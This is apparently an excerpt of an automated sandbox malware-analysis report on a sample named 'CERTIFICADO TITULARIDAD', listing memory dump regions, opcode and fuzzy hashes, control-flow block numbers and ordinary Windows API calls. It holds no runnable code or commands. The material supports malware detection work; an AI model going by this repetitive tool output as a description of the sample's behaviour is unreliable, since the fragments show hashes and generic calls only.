                                                                                                                          • Source File: 00000004.00000002.3403677783.000000003A430000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A430000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a430000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d56ade5397ea5b1b71a38794cc939ca5c9c0a8129b3b11b5723f0fcf5021c85e
                                                                                                                          • Instruction ID: 90f0c9edc938a85f35b55f2e0fa192bc4b667a1ceb6225ac10b4b83ee3c113b8
                                                                                                                          • Opcode Fuzzy Hash: d56ade5397ea5b1b71a38794cc939ca5c9c0a8129b3b11b5723f0fcf5021c85e
                                                                                                                          • Instruction Fuzzy Hash: 0781BF74E01219CFEB14DFA5C980AADBBB2FF89300F208169D819BB394DB359946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b29faf038e21d68a899e9cd6067615454534a0a17f516b2b7da90bab2a5fa68b
                                                                                                                          • Instruction ID: a6f4b008f6d88c5c0d985e5ea53a6d42cf60a55a85b14fb56e0565c0b4729e64
                                                                                                                          • Opcode Fuzzy Hash: b29faf038e21d68a899e9cd6067615454534a0a17f516b2b7da90bab2a5fa68b
                                                                                                                          • Instruction Fuzzy Hash: 8591E374E00718CFDB15DFA9D884A9DBBF2BF89301F14806AE809AB365DB309985CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2fa8c825f2c785419672b6e995c2a44d7ca57953a28057a01d5bd136fe0fa5e
                                                                                                                          • Instruction ID: 906262d3961907a5ea96e956125ac9c88d69abc371dde69d65999f7862cb40a7
                                                                                                                          • Opcode Fuzzy Hash: e2fa8c825f2c785419672b6e995c2a44d7ca57953a28057a01d5bd136fe0fa5e
                                                                                                                          • Instruction Fuzzy Hash: FE516F70D042988FDB19DFB5D8907DEBFB2AF86700F5481ADC495AB216EB349846CF40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 911fd3b03119e27cac3cde13271daaf83512cbe3029fc5fec5819b80a0d6d757
                                                                                                                          • Instruction ID: fc7144e1feabcdf7e19b902ca5eab022a75d33614126fe436734b8c43ba8ac3e
                                                                                                                          • Opcode Fuzzy Hash: 911fd3b03119e27cac3cde13271daaf83512cbe3029fc5fec5819b80a0d6d757
                                                                                                                          • Instruction Fuzzy Hash: 35819474E00219CFEB54DFAAD844A9DBBF2BF88310F14D06AE419AB365DB309945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05e83ffbad6108dd4165af54e908f60c109c0d92cb5e4765892995d9d87f277e
                                                                                                                          • Instruction ID: da06a7076fca831bc24d5e855970c0a86e247b7a221560de83007fbae3f857fc
                                                                                                                          • Opcode Fuzzy Hash: 05e83ffbad6108dd4165af54e908f60c109c0d92cb5e4765892995d9d87f277e
                                                                                                                          • Instruction Fuzzy Hash: 4981A774E00218DFDB54DFAAD844A9DBBF2BF89300F14D06AE409AB365DB749945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9a267e15b4fae5a4926259b75cb5d7b710ac8291d6745fbd0d761cb5b0b061c5
                                                                                                                          • Instruction ID: df6b7a609f1dcc27d7fdfb86e7f73f01e505b5b5f58073c98f94e745acd92961
                                                                                                                          • Opcode Fuzzy Hash: 9a267e15b4fae5a4926259b75cb5d7b710ac8291d6745fbd0d761cb5b0b061c5
                                                                                                                          • Instruction Fuzzy Hash: CA819674E00219DFEB54DFAAD844A9DBBF2BF88300F14C06AE419AB365DB309945CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbe6dc71b0b1da4081fbc12c42e5f47b16768e9601207248e729e37c637ba2fe
                                                                                                                          • Instruction ID: 5db1b285764eabb2ba9849536ebea187d2254fe990ec4f25c8d03fbaa30c45a7
                                                                                                                          • Opcode Fuzzy Hash: cbe6dc71b0b1da4081fbc12c42e5f47b16768e9601207248e729e37c637ba2fe
                                                                                                                          • Instruction Fuzzy Hash: AC81A374E00219DFEB54DFAAD994A9DFBF2BF88300F14806AE419AB365DB309941CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bfc47bb1f2b9c9f92432a2944b0601490cdd86041b5f6cba81950e721f8b2d8a
                                                                                                                          • Instruction ID: d5193e02a370b7397a5782f1d92502861e2c59c70c94b49c9476fd449d658f13
                                                                                                                          • Opcode Fuzzy Hash: bfc47bb1f2b9c9f92432a2944b0601490cdd86041b5f6cba81950e721f8b2d8a
                                                                                                                          • Instruction Fuzzy Hash: D881A574E01218DFDB54DFAAD884A9DBBF2FF88300F14906AE409AB365DB309985CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eeffa89430417c4d328968bf3a24b3e448cbfcdac075b5cc25b219f20868a9a7
                                                                                                                          • Instruction ID: 61de9dd800dcab165d394738946ab32c579c7449cbc4301fbceaa8e6996535fb
                                                                                                                          • Opcode Fuzzy Hash: eeffa89430417c4d328968bf3a24b3e448cbfcdac075b5cc25b219f20868a9a7
                                                                                                                          • Instruction Fuzzy Hash: 297195B5D016188FEB68CF66C944B9EBBF2BF88300F14C1E9D448A7254DB745A85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f81fb3de40da617cf2375584df1af4d24a3be1f0408add85e5b681c78ed890f6
                                                                                                                          • Instruction ID: 98f6ea3b2dd1acf98e5345212077f6379b947eea072fa46f26d9fe91b97da185
                                                                                                                          • Opcode Fuzzy Hash: f81fb3de40da617cf2375584df1af4d24a3be1f0408add85e5b681c78ed890f6
                                                                                                                          • Instruction Fuzzy Hash: D4514F70D042988FDB19CFB5C8A07DDBFB2AF86700F5491ADC495AB256EB359846CF40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 55b1898cb7165f8ffc0db06c442c75cfca969bc6f584cffe2f58c07fe879dcf0
                                                                                                                          • Instruction ID: 0d2b30555d356c4e6e103a191392a53fb8ba5b018d8a61f38a8af09f1b236ee3
                                                                                                                          • Opcode Fuzzy Hash: 55b1898cb7165f8ffc0db06c442c75cfca969bc6f584cffe2f58c07fe879dcf0
                                                                                                                          • Instruction Fuzzy Hash: A451A674E00249DFDB18DFAAD844A9DBBB2FF88300F24912AE815BB365DB305941CF14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3373077672.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51dcf693afdba2891dd144f79db85471655577bd6ec9b16c7b5662d887b3a5cf
                                                                                                                          • Instruction ID: 2dac80b123dd469f6bff4a207a2241822d40fa4edb902fcb6d4a8e5151d724b4
                                                                                                                          • Opcode Fuzzy Hash: 51dcf693afdba2891dd144f79db85471655577bd6ec9b16c7b5662d887b3a5cf
                                                                                                                          • Instruction Fuzzy Hash: 28519674E00249DFEB18DFAAD854A9DBBB2FF88300F24912AE815BB365DB305941CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2b1d6be9d83b51d49b01dd8be46391e653ffa90e86580899a1c301ee4aad1a31
                                                                                                                          • Instruction ID: 1a019c30d5f59013fe41830a5611985c65c8bea84f1d6d5204453ef5ec767d6d
                                                                                                                          • Opcode Fuzzy Hash: 2b1d6be9d83b51d49b01dd8be46391e653ffa90e86580899a1c301ee4aad1a31
                                                                                                                          • Instruction Fuzzy Hash: 6141C2B0E012188BEB18DFAAC8947DDFBF2AF89300F14D16AC418BB255DB355946CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ad46261b89a8e18a3bfd135f244596e3530f52b5991788bef82353d7104f0947
                                                                                                                          • Instruction ID: 50526affbe37cdc1770a6b0c1d34c31daf08f55266e9e4c48df53917916f9cdd
                                                                                                                          • Opcode Fuzzy Hash: ad46261b89a8e18a3bfd135f244596e3530f52b5991788bef82353d7104f0947
                                                                                                                          • Instruction Fuzzy Hash: 3D417A71E016598BEB58CF6BCD4479AFAF3AFC9300F14C1B9C40CA6254EB750A858F51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5a558c295e2038934df3e37e61c36d8a8559942f4378b22964ef2bd739e5dc74
                                                                                                                          • Instruction ID: 3abf9a06a516a1efee20c947263b7eff5d4f5fe8054d4201b5427e78911ee56c
                                                                                                                          • Opcode Fuzzy Hash: 5a558c295e2038934df3e37e61c36d8a8559942f4378b22964ef2bd739e5dc74
                                                                                                                          • Instruction Fuzzy Hash: 9241C274E01248CFEB18CFAAD9806DDBBF2AF89300F14D12AC419AB354EB355946CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403703136.000000003A440000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A440000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a440000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c4053e7277709449d26cdd82abf6e5506fdf2be4b826e03a3145b9005518e050
                                                                                                                          • Instruction ID: 9ad82d6dc4bd827ff167355e26cb440edac3f72a310cb9836e6840da5c05ce7a
                                                                                                                          • Opcode Fuzzy Hash: c4053e7277709449d26cdd82abf6e5506fdf2be4b826e03a3145b9005518e050
                                                                                                                          • Instruction Fuzzy Hash: 2941E1B4E002188FEB58DFAAD9506DDBBF2BF89300F24D16AC418BB255EB345946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403631890.000000003A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A410000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a410000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bf5132aa750e43a6f143dd2ffacea4a0a7ef9d6ab256bc354893841e34de50d4
                                                                                                                          • Instruction ID: 89855ccd0f6382f4d347c4b12d0be5f50fc150e415b76f8244ac810a8580cb5e
                                                                                                                          • Opcode Fuzzy Hash: bf5132aa750e43a6f143dd2ffacea4a0a7ef9d6ab256bc354893841e34de50d4
                                                                                                                          • Instruction Fuzzy Hash: 3441B574E01248CFEB58DFAAD9806DDBBF2AF89300F14D12AC419BB254EB345946CF44

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A489776
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A4897B3
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A4897F0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A489849
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: 2eb140ebbd37775e529b0b91bf959b7275ea80ad02e27629d6c9e596b3e23b7a
                                                                                                                          • Instruction ID: 935925213704cc371fb686cd99fd2adec21e3305614f4927b69e28a7f2bbc518
                                                                                                                          • Opcode Fuzzy Hash: 2eb140ebbd37775e529b0b91bf959b7275ea80ad02e27629d6c9e596b3e23b7a
                                                                                                                          • Instruction Fuzzy Hash: 555168B0900749CFDB04CFA9D544BDEBBF5AF89300F208059E459B7361DB79A981CB65

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A489776
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A4897B3
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A4897F0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A489849
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: 4c5b322d059b41821cebd6cd17cbb8b1f1d1e99836d93ca0bc04977338f9a122
                                                                                                                          • Instruction ID: 26c43adf080fa4e9a4883a74a3b5962599b0dc8500238de6d07c0c1e002b3a00
                                                                                                                          • Opcode Fuzzy Hash: 4c5b322d059b41821cebd6cd17cbb8b1f1d1e99836d93ca0bc04977338f9a122
                                                                                                                          • Instruction Fuzzy Hash: 6F5145B0900649CFEB04CFA9D544BDEBBF5AB88314F208459E419B7361DB79A940CB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 870 3a574284-3a5742f6 871 3a574301-3a574308 870->871 872 3a5742f8-3a5742fe 870->872 873 3a574313-3a57434b 871->873 874 3a57430a-3a574310 871->874 872->871 875 3a574353-3a5743b2 CreateWindowExW 873->875 874->873 876 3a5743b4-3a5743ba 875->876 877 3a5743bb-3a5743f3 875->877 876->877 881 3a5743f5-3a5743f8 877->881 882 3a574400 877->882 881->882 883 3a574401 882->883 883->883
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A5743A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403890309.000000003A570000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A570000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a570000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 716092398-0
                                                                                                                          • Opcode ID: a22c9e7c1cafbe9d60249ce2bb56c51f5ea810d17ecd36b3fb583c8af2e9236e
                                                                                                                          • Instruction ID: c5ec191281fd19d29d8ac185dc781a7bd22eba7983b9aed2fb5904d37dd2d2a4
                                                                                                                          • Opcode Fuzzy Hash: a22c9e7c1cafbe9d60249ce2bb56c51f5ea810d17ecd36b3fb583c8af2e9236e
                                                                                                                          • Instruction Fuzzy Hash: E251F3B1C10359DFDB14CFA9D980ADEBFB5BF48300F64812AE818A7210DB759881CF90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 884 3a574290-3a5742f6 885 3a574301-3a574308 884->885 886 3a5742f8-3a5742fe 884->886 887 3a574313-3a5743b2 CreateWindowExW 885->887 888 3a57430a-3a574310 885->888 886->885 890 3a5743b4-3a5743ba 887->890 891 3a5743bb-3a5743f3 887->891 888->887 890->891 895 3a5743f5-3a5743f8 891->895 896 3a574400 891->896 895->896 897 3a574401 896->897 897->897
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A5743A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403890309.000000003A570000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A570000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a570000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 716092398-0
                                                                                                                          • Opcode ID: b6c2016bdcef960f1db8761cdfb6d8e9cbc27a8ad965fc405b9d27e678d4be2c
                                                                                                                          • Instruction ID: cd67521adb41e739da7ca1d65aabec75a0609d4ef7a271cc4f2c191d98fd460e
                                                                                                                          • Opcode Fuzzy Hash: b6c2016bdcef960f1db8761cdfb6d8e9cbc27a8ad965fc405b9d27e678d4be2c
                                                                                                                          • Instruction Fuzzy Hash: A941CFB5D10349DFDB14CF99D984ADEBBB5BF48310F64812AE818AB210DB75A881CF90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 898 3a571994-3a576a0c 901 3a576a12-3a576a17 898->901 902 3a576abc-3a576adc call 3a57186c 898->902 903 3a576a6a-3a576aa2 CallWindowProcW 901->903 904 3a576a19-3a576a50 901->904 909 3a576adf-3a576aec 902->909 906 3a576aa4-3a576aaa 903->906 907 3a576aab-3a576aba 903->907 911 3a576a52-3a576a58 904->911 912 3a576a59-3a576a68 904->912 906->907 907->909 911->912 912->909
                                                                                                                          APIs
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 3A576A91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403890309.000000003A570000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A570000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a570000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallProcWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714655100-0
                                                                                                                          • Opcode ID: 8259bab16fafefa60a948de98d66d016742beba0dd6e3d1a6232aa89497ed157
                                                                                                                          • Instruction ID: cdf11b98b5a8ca6bbfc5abf02fdfb4d529030875e7a9f7a9d4e1f26af138172c
                                                                                                                          • Opcode Fuzzy Hash: 8259bab16fafefa60a948de98d66d016742beba0dd6e3d1a6232aa89497ed157
                                                                                                                          • Instruction Fuzzy Hash: 17411AB9900309DFDB14CF99C484A9ABBF5FF88314F25C859E519BB721D739A841CBA0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1092 3a489938-3a4899d4 DuplicateHandle 1093 3a4899dd-3a4899fa 1092->1093 1094 3a4899d6-3a4899dc 1092->1094 1094->1093
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A4899C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 0d618f29402b38e65fbed860d64ad38cdbdda68b84f8355dfdf7128d24962387
                                                                                                                          • Instruction ID: 5e34292a05825c99d31c4370b058cd0b5257f82de0589ed9b2216af55d0bfef4
                                                                                                                          • Opcode Fuzzy Hash: 0d618f29402b38e65fbed860d64ad38cdbdda68b84f8355dfdf7128d24962387
                                                                                                                          • Instruction Fuzzy Hash: A32105B5900248DFDB10CFA9D980AEEFFF4EB48310F24801AE958A3311C379A941CF60

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1097 3a489940-3a4899d4 DuplicateHandle 1098 3a4899dd-3a4899fa 1097->1098 1099 3a4899d6-3a4899dc 1097->1099 1099->1098
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A4899C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403821024.000000003A480000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A480000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a480000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: d18423f4675a404ed5055e51d8435aa07df1dbc2383e6eaa4dd68c7573605a04
                                                                                                                          • Instruction ID: 6097135a9be409ed3a60a9c66f6c29adf5fa13081ba99de76a89ba55f08614eb
                                                                                                                          • Opcode Fuzzy Hash: d18423f4675a404ed5055e51d8435aa07df1dbc2383e6eaa4dd68c7573605a04
                                                                                                                          • Instruction Fuzzy Hash: DB21D8B5900249DFDB10CF9AD984ADEFBF8EB48310F14841AE954A7310D379A950CFA5
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 3A578F6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403890309.000000003A570000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A570000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a570000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: f9fbd847c81d405b58d4522a1b08b20f9c1fbe7f4c3662b03b1908bfdc5e31d1
                                                                                                                          • Instruction ID: 0c8bf3a437be3e6f6e1c331f295de33f478f1e2ff5a42045c18f45b228444d40
                                                                                                                          • Opcode Fuzzy Hash: f9fbd847c81d405b58d4522a1b08b20f9c1fbe7f4c3662b03b1908bfdc5e31d1
                                                                                                                          • Instruction Fuzzy Hash: 411133B19043488FDB20DF9AD584B8EBBF4EF48220F20845AD518B7200C379A980CFA5
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 3A578F6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403890309.000000003A570000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A570000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_3a570000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: bf15d3f0ae0d0b57c1c90e0c0206d43ecb46f270a60fa31a7f8c64e49360448e
                                                                                                                          • Instruction ID: fea63d40aa0e194a87ccf09dcfb961d3e5ad25ee8b0ef2aa7cb6ad8f35490275
                                                                                                                          • Opcode Fuzzy Hash: bf15d3f0ae0d0b57c1c90e0c0206d43ecb46f270a60fa31a7f8c64e49360448e
                                                                                                                          • Instruction Fuzzy Hash: 2A1100B59007498FDB10DFAAD584BDEBBF4EB48220F24845AE558A7210D379A580CFA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 0-3916222277
                                                                                                                          • Opcode ID: 3fd070ad086696a244cae63d509c2b30cc86f5417ff381122ec44e9f8b47bb86
                                                                                                                          • Instruction ID: 3702b9d11c962d524427c57b619ead46657013f38a1f0ab5dcd193240d250890
                                                                                                                          • Opcode Fuzzy Hash: 3fd070ad086696a244cae63d509c2b30cc86f5417ff381122ec44e9f8b47bb86
                                                                                                                          • Instruction Fuzzy Hash: 8AA1F4347003449FEB15AF38885966D3BA6EFC6B60F208729F8659B3D1CE349D45CBA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
